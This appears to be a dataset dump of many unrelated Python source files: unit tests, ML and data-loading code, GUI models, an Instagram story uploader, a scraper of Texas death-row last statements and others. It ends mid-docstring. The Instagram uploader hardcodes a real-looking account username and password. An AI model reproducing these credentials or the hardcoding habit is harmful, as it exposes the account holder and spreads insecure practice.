content
stringlengths 5
1.05M
|
|---|
import unittest
from credentials import Credentials
class TestCredentials(unittest.TestCase):
'''
class that defines TestCredentials' test cases
Args:
unittest.TestCase: aids in creating new testcases.
'''
def setUp(self):
'''
runs before every test case
'''
self.new_credentials = Credentials("Instagram","Burence", "Br1")
def test_init(self):
'''
test for testing proper object initialization
'''
self.assertEqual(self.new_credentials.app_name, "Instagram")
self.assertEqual(self.new_credentials.acc_username, "Burence")
self.assertEqual(self.new_credentials.acc_password, "Br1")
def tearDown(self):
'''
test case to clear credentials list after every test has run
'''
Credentials.credentials_list = []
def test_add_mutliple_credentials(self):
'''
test case for add credentials logic
'''
self.new_credentials.add_credentials()
test_credentials = Credentials ("Twitter", "Moringa", "123r")
test_credentials.add_credentials()
self.assertEqual(len(Credentials.credentials_list),2)
def test_display_credentials(self):
'''
test case for displaying user's credentials
'''
self.assertEqual(Credentials.credentials_list,Credentials.display_credentials())
def test_credentials_exist(self):
'''
test case for confirming credentials that exist
'''
self.new_credentials.add_credentials()
test_credentials = Credentials("Instagram", "Burence","Br1")
test_credentials.add_credentials()
credential_exist = Credentials.credentials_exist("Instagram")
self.assertTrue(credential_exist)
def test_search__app_name(self):
'''
test case for searching app by name
'''
self.new_credentials.add_credentials()
test_credentials = Credentials("Instagram", "Burence", "Br1")
test_credentials.add_credentials()
found_credentials = Credentials.search_app_name("Instagram")
self.assertEqual(found_credentials.app_name, test_credentials.app_name)
def test_delete_credentials(self):
'''
test case for delete credentials logic
'''
self.new_credentials.add_credentials()
test_credentials = Credentials("Instagram", "Burence", "Br1")
test_credentials.add_credentials()
test_credentials.delete_credentials()
self.assertEqual(len(Credentials.credentials_list), 1)
if __name__ == '__main__':
unittest.main()
|
## @file
## @brief @ref avr
## @copyright Dmitry Ponyatov <dponyatov@gmail.com> CC-NC-ND
## github: https://github.com/ponyatov/metapy430
from frame import *
## @defgroup avr AVR
## @brief @ref avr
## @ingroup mcu
## @{
class AVR(ARCH): pass
class ATmega(MCU): pass
## @}
|
# Copyright 2017 by Kurt Rathjen. All Rights Reserved.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
from studioqt import QtGui
from studioqt import QtCore
from studioqt import QtWidgets
def showWaitCursor(fn):
def wrapped(*args, **kwargs):
cursor = QtGui.QCursor(QtCore.Qt.WaitCursor)
QtWidgets.QApplication.setOverrideCursor(cursor)
try:
return fn(*args, **kwargs)
finally:
QtWidgets.QApplication.restoreOverrideCursor()
wrapped.__name__ = fn.__name__
wrapped.__doc__ = fn.__doc__
return wrapped
def showArrowCursor(fn):
def wrapped(*args, **kwargs):
cursor = QtGui.QCursor(QtCore.Qt.ArrowCursor)
QtWidgets.QApplication.setOverrideCursor(cursor)
try:
return fn(*args, **kwargs)
finally:
QtWidgets.QApplication.restoreOverrideCursor()
wrapped.__name__ = fn.__name__
wrapped.__doc__ = fn.__doc__
return wrapped
|
import tensorflow as tf
import numpy as np
from ml_utils.keras import get_states, set_states, apply_regularization
from ml_utils.model_builders import dense_stack
from .pget import create_traces, update_traces, step_weights_opt
from .pget import explore_continuous, explore_discrete, explore_multibinary
#TODO: saving/loading?
#TODO: args/kwargs for get_action/train, maybe accept "done" in train
#TODO: actually support alt_trace_method.... (see pget.update_traces...)
class Agent():
"""Note: requires TF eager"""
def __init__(self, model, optimizer=None, action_type="continuous", alt_trace_method=False,
epsilon=1e-7, advantage_clip=1, gamma=0.99, lambda_=0.9,
regularization=1e-6, noise=0.1, initial_deviation=1,
late_squash=True, use_squared_deviation=True):
self.model = model
#TODO: is this needed?
self.input_shape = tuple(self.model.input_shape[1:])
self.output_shape = tuple(self.model.output_shape[1:])
#hyperparameters
self.eps = epsilon
self.advantage_clip = advantage_clip
self.gamma = gamma
self.lambda_ = lambda_
self.alt_trace_method = alt_trace_method
self.regularization = regularization
self.noise = noise
self.last_advantage = 0
self.late_squash = late_squash
self.optimizer = (optimizer if optimizer is not None else
tf.keras.optimizers.Adam(1e-3, clipnorm=1.0))
self.use_squared_deviation = use_squared_deviation
#resolve exploration method/loss function
self.action_type = action_type.lower()
if self.action_type == "discrete":
self.loss = tf.keras.losses.categorical_crossentropy
explore_func = explore_discrete
elif self.action_type == "multibinary":
self.loss = tf.keras.losses.binary_crossentropy
explore_func = explore_multibinary
elif self.action_type == "continuous":
#TODO: try huber loss again?
self.loss = tf.losses.mean_squared_error
explore_func = explore_continuous
else:
raise ValueError("Unknown action type '{}'".format(action_type))
#haha jk.
if self.late_squash:
explore_func = explore_continuous
self.loss = tf.losses.mean_squared_error
self.squash = (tf.nn.softmax if self.action_type == "discrete" else
tf.nn.sigmoid if self.action_type == "multibinary" else None)
self.explore = lambda x: explore_func(x, self.noise)
#initialization
self.traces = create_traces(self.model)
self.reward_mean = 0
self.reward_deviation = initial_deviation
def get_action(self, state):
#housekeeping
state = state.astype("float32")
#save pre-step hidden state
pre_step_state = get_states(self.model)
#calc action from state
#action = self.model.predict(np.expand_dims(state, 0))[0]
#https://github.com/keras-team/keras/issues/13118
#https://github.com/tensorflow/tensorflow/issues/33009
action = self.model.predict_on_batch(np.expand_dims(state, 0))[0]
#apply noise to action
action = self.explore(action)
#TODO: early bail?
#calc gradient for modified action & update traces based on gradient
update_traces(self.model, pre_step_state, self.traces,
np.expand_dims(state, 0), np.expand_dims(action, 0), self.loss, lambda_=self.lambda_)
#if discrete/multibinary, then squash
if self.late_squash and self.action_type != "continuous":
action = self.squash(action)
#explore with 0 noise just to get 0s/1s
action = (explore_discrete(action, 0) if self.action_type == "discrete" else
explore_multibinary(action, 0) if self.action_type == "multibinary" else action)
return action
def train(self, reward):
#scale/clip reward to calculate advantage
delta_reward = reward - self.reward_mean
advantage = delta_reward / (self.reward_deviation + self.eps)
if self.advantage_clip is not None:
advantage = np.clip(advantage, -self.advantage_clip, self.advantage_clip)
#update reward mean/deviation
self.reward_mean += delta_reward * (1 - self.gamma)
#TODO: experimental square instead of abs
if self.use_squared_deviation:
self.reward_deviation += (delta_reward ** 2 - self.reward_deviation) * (1 - self.gamma)
else:
self.reward_deviation += (np.abs(delta_reward) - self.reward_deviation) * (1 - self.gamma)
self.last_advantage = advantage
#step network in direction of trace gradient * advantage
apply_regularization(self.model, self.regularization)
step_weights_opt(self.model, self.traces, advantage, self.model.optimizer)
|
import json
import maya.cmds as mc
def pyToAttr(objAttr, data):
"""
Write (pickle) Python data to the given Maya obj.attr. This data can
later be read back (unpickled) via attrToPy().
Arguments:
objAttr : string : a valid object.attribute name in the scene. If the
object exists, but the attribute doesn't, the attribute will be added.
The if the attribute already exists, it must be of type 'string', so
the Python data can be written to it.
data : some Python data : Data that will be pickled to the attribute
in question.
"""
obj, attr = objAttr.split('.')
# Add the attr if it doesn't exist:
if not mc.objExists(objAttr):
mc.addAttr(obj, longName=attr, dataType='string')
# Make sure it is the correct type before modifing:
if mc.getAttr(objAttr, type=True) != 'string':
raise Exception("Object '%s' already has an attribute called '%s', but it isn't type 'string'"%(obj,attr))
# Pickle the data and return the coresponding string value:
stringData = json.dumps(data)
# Make sure attr is unlocked before edit:
mc.setAttr(objAttr, edit=True, lock=False)
# Set attr to string value:
mc.setAttr(objAttr, stringData, type='string')
# And lock it for safety:
mc.setAttr(objAttr, edit=True, lock=True)
def attrToPy(objAttr):
"""
Take previously stored (pickled) data on a Maya attribute (put there via
pyToAttr() ) and read it back (unpickle) to valid Python values.
Arguments:
objAttr : string : A valid object.attribute name in the scene. And of course,
it must have already had valid Python data pickled to it.
Return : some Python data : The reconstituted, unpickled Python data.
"""
# Get the string representation of the pickled data. Maya attrs return
# unicode vals, and cPickle wants string, so we convert:
# objAttr = str(objAttr)
# Un-pickle the string data:
print objAttr
loadedData = json.loads(objAttr)
return loadedData
|
from instapy_cli import client
def upload_stories(image):
username = 'clippingcatolico'
password = 'neto1234'
image = image
with client(username, password) as cli:
cli.upload(image, story=True)
|
from pandas import Series
from pytest import approx
from signature_scoring.models import Profile
from helpers.mathtools import split_to_pos_and_neg
from helpers.cache import hash_series
from signature_scoring.models import Signature
from signature_scoring.scoring_functions.generic_scorers import score_spearman
import signature_scoring.scoring_functions.connectivity_score as connectivity
disease = Series({'BRCA1': 10, 'B': 1, 'T': -1, 'TP53': -10})
drug_1 = Series({'BRCA1': -10, 'T': -1, 'B': 1, 'TP53': +10})
drug_2 = Series({'BRCA1': -10, 'T': 1, 'B': -1, 'TP53': +10})
drug_3 = Series({'BRCA1': 2, 'TP53': -1, 'B': 1, 'T': -1})
def test_profile_ranks():
disease_profile = Profile(disease)
disease_ranks = {
gene: i + 1
for i, gene in enumerate(disease.sort_values().index)
}
#assert disease.rank().to_dict() == disease_ranks
#assert disease_ranks == {'BRCA1': 4, 'B': 3, 'T': 2, 'TP53': 1}
#assert disease_profile.top.ranks.to_dict() == disease_ranks
#assert disease_profile.full.ranks.to_dict() == disease_ranks
def test_zero_split():
pos, neg = split_to_pos_and_neg(disease.values)
assert list(pos) == [0, 1]
assert list(neg) == [2, 3]
pos, neg = split_to_pos_and_neg(Series({'A': 1, 'B': 0, 'C': 1}).values)
assert list(pos) == [0, 2]
assert list(neg) == []
def test_split():
down, up = Signature(disease).split(10)
assert list(down.index) == ['TP53', 'T']
assert list(up.index) == ['BRCA1', 'B']
down, up = Signature(Series(
dict(zip(
'ABCDEFGHI',
range(1, 10)
))
)).split(5)
assert list(down.index) == []
assert list(up.index) == ['I', 'H', 'G', 'F', 'E']
def test_hash():
# identical objects have same hash
assert hash_series(drug_1) == hash_series(drug_1)
# different values make different hashes
assert hash_series(drug_1) != hash_series(drug_2)
# different indexes make different hashes
drug_1_reindexed = drug_1.reindex(['B', 'BRCA1', 'TP53', 'T'])
assert hash_series(drug_1) != hash_series(drug_1_reindexed)
def test_profile_split():
drug_profile = Profile(drug_1)
drug_down, drug_up = Signature(drug_1).split(10)
assert (drug_down == drug_profile.top.down).all()
assert (drug_up == drug_profile.top.up).all()
def test_spearmanr():
disease_profile = Profile(disease)
drug_profile = Profile(drug_1)
assert score_spearman(disease_profile, drug_profile) == approx(2)
assert score_spearman(disease_profile, disease_profile) == approx(-2)
def test_cramer():
assert connectivity.cramér_von_mises(disease, drug_1) == 50
assert connectivity.cramér_von_mises(disease, disease) == 0
|
from unittest import TestCase
import numpy as np
import pandas as pd
from pyfibre.model.objects.fibre import (
Fibre
)
from pyfibre.model.tools.metrics import FIBRE_METRICS
from pyfibre.tests.probe_classes.objects import ProbeFibre
class TestFibre(TestCase):
def setUp(self):
self.fibre = ProbeFibre()
def test__getstate__(self):
status = self.fibre.to_json()
self.assertIn('growing', status)
new_fibre = Fibre.from_json(status)
status = new_fibre.to_json()
self.assertDictEqual(
status['graph'],
{'directed': False,
'graph': {},
'links': [{'r': 1.4142135623730951, 'source': 2, 'target': 3},
{'r': 1.4142135623730951, 'source': 3, 'target': 4},
{'r': 1, 'source': 4, 'target': 5}],
'multigraph': False,
'nodes': [{'xy': [0, 0], 'id': 2},
{'xy': [1, 1], 'id': 3},
{'xy': [2, 2], 'id': 4},
{'xy': [2, 3], 'id': 5}]
}
)
def test_node_list_init(self):
fibre = Fibre(nodes=[2, 3, 4, 5],
edges=[(3, 2), (3, 4), (4, 5)])
self.assertEqual(4, fibre.number_of_nodes)
self.assertEqual([2, 3, 4, 5], fibre.node_list)
self.assertTrue(fibre.growing)
self.assertTrue(np.allclose(np.array([0, 0]), fibre._d_coord))
self.assertTrue(np.allclose(np.array([0, 0]), fibre.direction))
self.assertEqual(90, fibre.angle)
self.assertEqual(0, fibre.euclid_l)
self.assertEqual(0, fibre.fibre_l)
self.assertTrue(np.isnan(fibre.waviness))
def test_network_init(self):
self.assertTrue(self.fibre.growing)
self.assertTrue(np.allclose(np.array([2, 3]), self.fibre._d_coord))
self.assertTrue(np.allclose(
np.array([-0.5547002, -0.83205029]), self.fibre.direction))
self.assertAlmostEqual(146.30993247, self.fibre.angle)
self.assertAlmostEqual(3.60555127, self.fibre.euclid_l)
self.assertAlmostEqual(3.82842712, self.fibre.fibre_l)
self.assertAlmostEqual(0.94178396, self.fibre.waviness)
def test_generate_database(self):
database = self.fibre.generate_database()
self.assertIsInstance(database, pd.Series)
self.assertEqual(3, len(database))
for metric in FIBRE_METRICS + ['Angle']:
self.assertIn(
f'Fibre {metric}', database)
|
"""
Schema validation tools
"""
import jsonschema
from . import versions
def validate(data, schema_type, version="dev"):
"""
Validates a given input for a schema input and output type.
"""
schema = versions.get_schema(schema_type, version)
jsonschema.validate(data, schema)
|
import os
import json
import jsonlines
import h5py
import networkx as nx
import math
import numpy as np
class ImageFeaturesDB(object):
def __init__(self, img_ft_file, image_feat_size):
self.image_feat_size = image_feat_size
self.img_ft_file = img_ft_file
self._feature_store = {}
def get_image_feature(self, scan, viewpoint):
key = '%s_%s' % (scan, viewpoint)
if key in self._feature_store:
ft = self._feature_store[key]
else:
with h5py.File(self.img_ft_file, 'r') as f:
ft = f[key][...][:, :self.image_feat_size].astype(np.float32)
self._feature_store[key] = ft
return ft
def get_obj_local_pos(raw_obj_pos):
x1, y1, w, h = raw_obj_pos[:, 0], raw_obj_pos[:, 1], raw_obj_pos[:, 2], raw_obj_pos[:, 3]
x2 = x1 + w
y2 = y1 + h
obj_local_pos = np.stack([x1/640, y1/480, x2/640, y2/480, w*h/(640*480)], 0).transpose()
return obj_local_pos
def load_obj_database(obj_feat_file, image_feat_size):
obj_feats = {}
with h5py.File(obj_feat_file, 'r') as f:
for key in f:
obj_feats[key] = {
'obj_ids': [str(x) for x in f[key].attrs['obj_ids']],
'fts': f[key][...].astype(np.float32)[:, :image_feat_size],
'bboxes': f[key].attrs['bboxes'],
'viewindexs': f[key].attrs['viewindexs'],
}
return obj_feats
def load_instr_datasets(anno_dir, dataset, splits, tokenizer):
data = []
for split in splits:
if "/" not in split: # the official splits
if tokenizer == 'bert':
filepath = os.path.join(anno_dir, 'REVERIE_%s_enc.json' % split)
elif tokenizer == 'xlm':
filepath = os.path.join(anno_dir, 'REVERIE_%s_enc_xlmr.json' % split)
else:
raise NotImplementedError('unspported tokenizer %s' % tokenizer)
with open(filepath) as f:
new_data = json.load(f)
else: # augmented data
print('\nLoading augmented data %s for pretraining...' % os.path.basename(split))
with open(split) as f:
new_data = json.load(f)
# Join
data += new_data
return data
def construct_instrs(anno_dir, dataset, splits, tokenizer=None, max_instr_len=512):
data = []
for i, item in enumerate(load_instr_datasets(anno_dir, dataset, splits, tokenizer)):
# Split multiple instructions into separate entries
for j, instr in enumerate(item['instructions']):
new_item = dict(item)
if 'objId' in item:
new_item['instr_id'] = '%s_%s_%d' % (str(item['path_id']), str(item['objId']), j)
else:
new_item['path_id'] = item['id']
new_item['instr_id'] = '%s_%d' % (item['id'], j)
new_item['objId'] = None
new_item['instruction'] = instr
new_item['instr_encoding'] = item['instr_encodings'][j][:max_instr_len]
del new_item['instructions']
del new_item['instr_encodings']
# ''' BERT tokenizer '''
# instr_tokens = ['[CLS]'] + tokenizer.tokenize(instr)[:max_instr_len-2] + ['[SEP]']
# new_item['instr_encoding'] = tokenizer.convert_tokens_to_ids(instr_tokens)
data.append(new_item)
return data
|
"""Test classifier_cls_by_name."""
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import MultinomialNB
from skutil.estimators import classifier_cls_by_name
def test_base():
assert classifier_cls_by_name('LogisticRegression') == LogisticRegression
assert classifier_cls_by_name('logisticregression') == LogisticRegression
assert classifier_cls_by_name('logreg') == LogisticRegression
assert classifier_cls_by_name('SVC') == SVC
assert classifier_cls_by_name('svc') == SVC
assert classifier_cls_by_name('SVM') == SVC
assert classifier_cls_by_name('svm') == SVC
assert classifier_cls_by_name('MultinomialNB') == MultinomialNB
assert classifier_cls_by_name('multinomialnb') == MultinomialNB
assert classifier_cls_by_name('mnb') == MultinomialNB
|
import allure
from page_objects.LoginPage import LoginPage
@allure.parent_suite("Проверка тестового магазина opencart")
@allure.suite("Тесты страницы авторизации")
@allure.epic("Проверка магазина на opencart")
@allure.feature("Проверка наличия элементов на странице логина")
@allure.title("Поиск элементов на странице логина")
@allure.description("""Тест проверяет наличие элементов на странице логина""")
@allure.severity(allure.severity_level.CRITICAL)
def test_find_elements_login_page(browser):
login_page = LoginPage(browser).open()
login_page.find_input_email()
login_page.find_continue_button()
login_page.find_input_password()
login_page.find_forgotten_password()
login_page.find_login_button()
@allure.parent_suite("Проверка тестового магазина opencart")
@allure.suite("Тесты страницы авторизации")
@allure.epic("Проверка магазина на opencart")
@allure.feature("Проверка возможности входа и выхода как пользователь")
@allure.title("Вход на странице авторизации")
@allure.description("""Тест проверяет возможность входа и выхода, как пользователь на странице авторизации""")
@allure.severity(allure.severity_level.CRITICAL)
def test_login_as_customer(browser):
# pytest.skip('Причина пропуска теста')
login_page = LoginPage(browser).open()
login_page.login_as_customer('test@ya.ru', 'test')
login_page.logout_as_customer()
login_page.verify_title('Account Logout')
|
from twilio.twiml.voice_response import Redirect, VoiceResponse
response = VoiceResponse()
response.redirect('http://www.foo.com/nextInstructions')
print(response)
|
# -*- coding: utf-8 -*-
import time
import requests
import pandas as pd
from bs4 import BeautifulSoup
INDEX_DEATH_ROW_INFO_URL = 1
INDEX_LAST_STATEMENT_URL = 2
base_url = "https://www.tdcj.texas.gov/death_row/"
death_row_infos = []
headers = {
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Language':'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6',
'Cache-Control':'max-age=0',
'Connection':'keep-alive',
'Cookie': "__utmc=67821652; __utmz=67821652.1550809495.1.1.utmcsr=ruanyifeng.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/2019/02/weekly-issue-44.html; menu_generic_headers=-1c; __utma=67821652.1534429385.1550809495.1550811580.1550815385.3; __utmt=1; __utmb=67821652.5.10.1550815385",
'Host':'www.tdcj.texas.gov',
'Upgrade-Insecure-Requests':'1',
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
}
source_html = requests.get(base_url + "dr_executed_offenders.html",
headers=headers).text
soup = BeautifulSoup(source_html, 'html.parser')
soup_table = soup.find("table", attrs={"class": "tdcj_table indent"})
soup_trs = soup_table.find_all("tr")
# parse attributes in first line
attribute_list = [soup_th.get_text().strip() for soup_th in soup_trs[0].find_all("th")]
# two attribute is fuzzy, change it
attribute_list[INDEX_DEATH_ROW_INFO_URL] = "Offender Information URL"
attribute_list[INDEX_LAST_STATEMENT_URL] = "Last Statement URL"
attribute_list = [attribute.lower().replace(" ", "_") for attribute in attribute_list]
# parse detail of death rows
for soup_death_row in soup_trs[1: ]:
soup_tds = soup_death_row.find_all("td")
value_list = [soup_td.get_text().strip() for soup_td in soup_tds]
# get special attribute value
death_row_info_url = base_url + soup_tds[INDEX_DEATH_ROW_INFO_URL].find("a").get('href')
last_statement_url = base_url + soup_tds[INDEX_LAST_STATEMENT_URL].find("a").get('href')
value_list[INDEX_DEATH_ROW_INFO_URL] = death_row_info_url
value_list[INDEX_LAST_STATEMENT_URL] = last_statement_url
death_row_infos.append(dict(zip(attribute_list, value_list)))
# get last statement
for death_row_info in death_row_infos:
last_statement_url = death_row_info["last_statement_url"]
print("number:", death_row_info["execution"])
last_statement_html = requests.get(last_statement_url,
headers=headers).text
soup = BeautifulSoup(last_statement_html, 'html.parser')
last_statement_fixed_html = soup.prettify()
split_results = soup.text.split('Last Statement:')
last_statement = split_results[1].strip() if len(split_results) > 1 else "No last statement"
split_results = last_statement.split('Employee Resource')
last_statement = split_results[0].strip() if len(split_results) > 1 else "No last statement"
print(last_statement)
death_row_info.update({"last_statement": last_statement})
time.sleep(3)
pd_data = pd.DataFrame(death_row_infos)
pd_data.to_csv("Last-Statement-of-Death-Row.csv")
|
# encoding: utf-8
"""
open booking connect
Copyright (c) 2021, binary butterfly GmbH
Use of this source code is governed by an MIT-style license that can be found in the LICENSE file.
"""
from typing import Union
from .redis import Redis
class RedisWrapper:
def __init__(self, redis: Redis, database: str):
self.redis = redis
self.database = database
async def get(self, key: Union[str, int]) -> Union[str, None]:
result = await self.redis.get(self.database, str(key))
if result is None:
return None
return result
async def set(self, key: Union[str, int], value: Union[str]):
return await self.redis.set(self.database, str(key), value)
async def remove(self, key: Union[str, int]):
return await self.redis.remove(self.database, str(key))
|
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from PySide2.QtWidgets import *
from PySide2 import QtCore
from GridCal.Engine.Simulations.result_types import ResultTypes
from GridCal.Engine.Simulations.results_table import ResultsTable
def fast_data_to_text(data, columns, index):
# header first
txt = '\t' + '\t'.join(columns) + '\n'
# data
for t, index_value in enumerate(index):
try:
if data[t, :].sum() != 0.0:
txt += str(index_value) + '\t' + '\t'.join([str(x) for x in data[t, :]]) + '\n'
except TypeError:
txt += str(index_value) + '\t' + '\t'.join([str(x) for x in data[t, :]]) + '\n'
return txt
def fast_data_to_numpy_text(data):
if len(data.shape) == 1:
txt = '[' + ', '.join(['{0:.6f}'.format(x) for x in data]) + ']'
elif len(data.shape) == 2:
if data.shape[1] > 1:
# header first
txt = '['
# data
for t in range(data.shape[0]):
txt += '[' + ', '.join(['{0:.6f}'.format(x) for x in data[t, :]]) + '],\n'
txt += ']'
else:
txt = '[' + ', '.join(['{0:.6f}'.format(x) for x in data[:, 0]]) + ']'
else:
txt = '[]'
return txt
class ResultsModel(QtCore.QAbstractTableModel):
"""
Class to populate a Qt table view with data from the results
"""
def __init__(self, table: ResultsTable, parent=None):
"""
:param table:
"""
QtCore.QAbstractTableModel.__init__(self, parent)
self.table = table
self.units = table.units
def flags(self, index):
if self.table.editable and index.column() > self.table.editable_min_idx:
return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
else:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
def rowCount(self, parent=None):
"""
:param parent:
:return:
"""
return self.table.r
def columnCount(self, parent=None):
"""
:param parent:
:return:
"""
return self.table.c
def data(self, index, role=QtCore.Qt.DisplayRole):
"""
:param index:
:param role:
:return:
"""
if index.isValid():
val = self.table.data_c[index.row(), index.column()]
if role == QtCore.Qt.DisplayRole:
if isinstance(val, str):
return val
elif isinstance(val, complex):
if val.real != 0 or val.imag != 0:
return val.__format__(self.table.format_string)
else:
return '0'
else:
if val != 0:
return val.__format__(self.table.format_string)
else:
return '0'
elif role == QtCore.Qt.BackgroundRole:
return None # QBrush(Qt.yellow)
return None
def headerData(self, section, orientation, role=None):
"""
Get the header value
:param section: header index
:param orientation: Orientation {QtCore.Qt.Horizontal, QtCore.Qt.Vertical}
:param role:
:return:
"""
if role == QtCore.Qt.DisplayRole:
if orientation == QtCore.Qt.Horizontal:
if len(self.table.cols_c) > section:
return self.table.cols_c[section]
elif orientation == QtCore.Qt.Vertical:
if self.table.index_c is None:
return section
else:
if self.table.isDate:
return self.table.index_c[section].strftime('%Y/%m/%d %H:%M.%S')
else:
return str(self.table.index_c[section])
return None
def slice_cols(self, col_idx) -> "ResultsModel":
"""
Make column slicing
:param col_idx: indices of the columns
:return: Nothing
"""
return ResultsModel(self.table.slice_cols(col_idx))
def search_in_columns(self, txt):
"""
Search stuff
:param txt:
:return:
"""
print('Searching', txt)
mdl = self.table.search_in_columns(txt)
if mdl is not None:
print('Found')
return ResultsModel(mdl)
else:
return None
def copy_to_column(self, row, col):
"""
Copies one value to all the column
@param row: Row of the value
@param col: Column of the value
@return: Nothing
"""
self.table.copy_to_column(row, col)
def is_complex(self):
return self.table.is_complex()
def get_data(self):
"""
Returns: index, columns, data
"""
return self.table.get_data()
def convert_to_cdf(self):
"""
Convert the data in-place to CDF based
:return:
"""
# calculate the proportional values of samples
self.table.convert_to_cdf()
def convert_to_abs(self):
"""
Convert the data to abs
:return:
"""
self.table.convert_to_abs()
def to_df(self):
"""
get DataFrame
"""
return self.table.to_df()
def save_to_excel(self, file_name):
"""
save data to excel
:param file_name:
"""
self.to_df().to_excel(file_name)
def save_to_csv(self, file_name):
"""
Save data to csv
:param file_name:
"""
self.to_df().to_csv(file_name)
def get_data_frame(self):
"""
Save data to csv
"""
return self.table.get_data_frame()
def copy_to_clipboard(self):
"""
Copy profiles to clipboard
"""
n = len(self.table.cols_c)
if n > 0:
index, columns, data = self.get_data()
txt = fast_data_to_text(data, columns, index)
# copy to clipboard
cb = QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
cb.setText(txt, mode=cb.Clipboard)
else:
# there are no elements
pass
def copy_numpy_to_clipboard(self):
"""
Copy profiles to clipboard
"""
n = len(self.table.cols_c)
if n > 0:
index, columns, data = self.get_data()
txt = fast_data_to_numpy_text(data)
# copy to clipboard
cb = QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
cb.setText(txt, mode=cb.Clipboard)
else:
# there are no elements
pass
def plot(self, ax=None, selected_col_idx=None, selected_rows=None):
"""
Plot the data model
:param ax: Matplotlib axis
:param selected_col_idx: list of selected column indices
:param selected_rows: list of rows to plot
"""
self.table.plot(ax=ax, selected_col_idx=selected_col_idx, selected_rows=selected_rows)
|
# -*- coding: utf-8 -*-
"""
.. module: byroapi.byroapi
:synopsis: Main module
.. moduleauthor:: "Josef Nevrly <josef.nevrly@gmail.com>"
"""
import asyncio
import io
import logging
from typing import BinaryIO, Union
from aioyagmail import AIOSMTP
from .http_handler import HttpHandler
from .template import Template, draw_on_template, register_fonts
from .base import ByroapiException
logger = logging.getLogger("byroapi")
class ByroApiError(ByroapiException):
pass
class ByroApi:
def __init__(self, config, loop=None):
self._config = config
self._loop = loop or asyncio.get_event_loop()
# REST
self._http_handler = HttpHandler(
self._loop,
form_request_clbk=self._process_form,
template_update_clbk=self._update_template
)
self._http_task = None
# Templates
register_fonts(self._config["templating"]["fonts"])
self._templates = {}
for template in self._config["templating"]["templates"]:
self._templates[template["id"]] = Template(
template, self._config["templating"]
)
def _fill_form(self, form_payload: dict) -> BinaryIO:
form_output = io.BytesIO()
try:
template = self._templates[form_payload["template"]]
except KeyError:
err_msg = f"Unknown template: {form_payload['template']}"
logger.error(err_msg)
form_output.close()
raise ByroApiError(err_msg)
draw_on_template(template.get_template_path(
form_payload["form_data"]),
form_output,
template.get_draw_function(form_payload["form_data"])
)
return form_output
def fill_form_to_file(self, form_payload: dict,
output_file: BinaryIO) -> None:
with self._fill_form(form_payload) as filled_form:
try:
output_file.write(filled_form.getbuffer())
except Exception as e:
raise e
async def _process_form(self, form_payload: dict) -> Union[BinaryIO, None]:
filled_form = self._fill_form(form_payload)
appendix_msg = ""
if form_payload["result"]["email"]["to"] is not None:
# Configure sender (default from SMTP config, or dynamic
# from the API request
smtp_settings = self._config["email"]["smtp"].cascade()
if form_payload["result"]["email"]["from"] is not None:
if "user" in smtp_settings:
logger.warning("Email 'from' field defined although user "
"set in SMTP configuration -> skipping.")
else:
smtp_settings["user"] = form_payload["result"][
"email"]["from"]
else:
if "user" not in smtp_settings:
logger.warning(
"User not configured in SMTP setting and no "
"'from' field defined in the request -> Sender will "
"be unknown.")
smtp_settings = dict(smtp_settings.copy_flat())
# Sending the result by mail
async with AIOSMTP(**smtp_settings) as yag:
# Prepare the buffer
filled_form.seek(0)
# Attachment file name
filled_form.name = form_payload["result"]["email"][
"attachments"] or f"{form_payload['template']}.pdf"
form_payload["result"]["email"]["attachments"] = filled_form
# Get rid of the from field
send_params = dict(form_payload["result"]["email"].copy_flat())
send_params.pop("from", None)
await yag.send(**send_params)
appendix_msg = \
f'Mail sent to {form_payload["result"]["email"]["to"]}'
logger.info("Form %s processed for data: {%s}. %s",
form_payload["template"],
"; ".join([f"{k}: {v}" for k, v in
form_payload["form_data"].items()]),
appendix_msg
)
if form_payload["result"]["download"]:
return filled_form
else:
return None
def _update_template(self, template_id, template_data, var_id):
try:
template = self._templates[template_id]
except KeyError:
raise ByroApiError(f"Unknown template: {template_id}")
# Get template path
template_path = template.get_template_file_path(var_id)
# Save the template
try:
with template_path.open("wb") as template_file:
template_file.write(template_data)
except Exception as e:
raise ByroApiError(f"Could not save template to {template_path}")
logger.info("Template %s updated for %s to file %s", template_id,
var_id, template_path)
def start(self):
# REST
self._http_task = self._loop.create_task(self._http_handler.run(
host=self._config['rest_api']['addr'],
port=self._config['rest_api']['port']
))
def stop(self):
# REST
self._http_handler.shutdown()
|
##!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Две модели гипергеометрическое распределение (N=2 и N=40)
Запуск:
python ./hypergeometric_distribution.py
Пример визуализации возникновения событий в соответствии с гипергеометрическим распределением.
Гипергеометрическое распределение моделирует количество удачных выборок без возвращения из конечной совокупности.
Его параметры:
- T (в модели константа T) - совокупность объектов
- D - количество объектов с заданным свойством в совокупности T
- n - количество объектов в выборке
